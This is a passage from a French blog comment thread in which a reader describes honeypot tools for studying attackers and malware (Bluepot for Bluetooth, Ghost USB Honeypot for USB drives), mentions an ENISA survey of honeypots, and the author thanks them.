    composant le site. et suivre les redirections vers les autres pages. ou ressources disponibles.

    de cette manière il sera possible d’identifier les faille exploitées par les pirates.

    bluepot est quand à lui un honeypot permettant d’étudier le comportement d’attaquants ciblant les périphériques
    bluetooth. son usage sera donc relativement limité.

    ghost usb honeypot est un pot de miel permettant d’étudier les malwares se propagent au travers de périphérique
    de stockage usb. cependant ce logiciel est très proche du hids host based ids puisqu’il a pour vocation à être

    installé sur des système mis en production. enfin il existe un très grand nombre d’honeypots.
    l’étude réalisée par l’enisa est à ce titre très intéressante. puisqu’elle recense un très grand nombre de pots de miel

    utilisables dans de nombreux contextes allant même jusqu’à évoquer le sujet des honeypots scada;

    Répondre
    • Bonjour et merci beaucoup pour ce complément d’information qui pourrait prendre un article à lui seul. Je vois que vous êtes très connaisseur dans le domaine et je vous remercie pour votre participation active.
      Amicalement

      Répondre

Laisser un commentaire

Menu